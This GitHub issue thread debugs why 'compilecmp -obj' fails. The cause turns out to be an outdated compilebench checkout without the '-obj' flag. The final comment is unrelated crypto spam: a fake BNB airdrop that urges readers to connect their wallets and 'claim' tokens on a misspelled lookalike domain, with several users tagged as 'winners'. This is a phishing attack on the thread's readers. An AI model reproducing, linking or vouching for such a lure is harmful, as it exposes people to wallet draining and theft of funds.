### ISSUE TITLE
-obj did not do what the doc lead me to believe it should

### ISSUE THREAD

**Issue by dr2chase** [josharian/compilecmp#1]
I typed: `compilecmp -all -obj`

I expected to see some object file sizes, but instead I saw this:
```
compilecmp   master   HEAD
14:00:39 copy tree at master (90b39f33c40e8d4ae085426313be69473f304e7d) to /usr/local/google/home/drchase/.compilecmp/90b39f33c40e8d4ae085426313be69473f304e7d
14:00:39 /usr/local/google/home/drchase/.compilecmp/90b39f33c40e8d4ae085426313be69473f304e7d/src/make.bash
14:01:26 copy tree at HEAD (f3c833e24bd9278603afa147a89b2b816e068ea5) to /usr/local/google/home/drchase/.compilecmp/f3c833e24bd9278603afa147a89b2b816e068ea5
14:01:26 /usr/local/google/home/drchase/.compilecmp/f3c833e24bd9278603afa147a89b2b816e068ea5/src/make.bash
before: /usr/local/google/home/drchase/.compilecmp/90b39f33c40e8d4ae085426313be69473f304e7d
after:  /usr/local/google/home/drchase/.compilecmp/f3c833e24bd9278603afa147a89b2b816e068ea5
benchstat -geomean  /tmp/824703058 /tmp/812777865
14:02:12 exit status 2
```

**Comment by josharian** [comment]
AFK but I think the bug here is actually the terrible error message ("exit status 2"). On a hunch, what is your git version? Might be old enough that 'git worktree --detach' doesn't exist.

**Comment by dr2chase** [comment]
git version 2.13.0.etc

Not quite latest, but close?

**Comment by josharian** [comment]
Yes, that should be fine. I'll have to go through and improve all error messages. If you are blocked on this and want to dig, next step is finding out where the exit status 2 is coming from.

**Comment by dr2chase** [comment]
I'm only semi-blocked; I'm taking a shot at verifying all the things for Heschi's DWARF CL.

**Comment by dr2chase** [comment]
Hmmmm:
```
refresh compilebench
multiple sources, choose one of these commands and run it:
    go get -u github.com/josharian/compilebench
    drwxr-x--- 3 drchase eng 4096 Jun 7 12:06 /usr/local/google/home/drchase/work/gocode/src/github.com/josharian/compilebench
    go get -u golang.org/x/tools/cmd/compilebench
    drwxr-x--- 2 drchase eng 4096 May 12 13:19 /usr/local/google/home/drchase/work/gocode/src/golang.org/x/tools/cmd/compilebench
```

**Comment by dr2chase** [comment]
But I also notice that compilebench has no "-obj" flag, seems like that is the problem.

**Comment by josharian** [comment]
Aha. Yes, `compilecmp` needs an updated copy of `compilebench` to work. Not sure how best to test for that. You should delete `github.com/josharian/compilebench` and use `golang.org/x/tools/cmd/compilebench`. The former was only there so I could send pull requests to Russ, prior to migrating it to gerrit.

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @iPaulPro, @dust, @haifeiWu, @Selhar, @okischuang, @asing177, @leopku
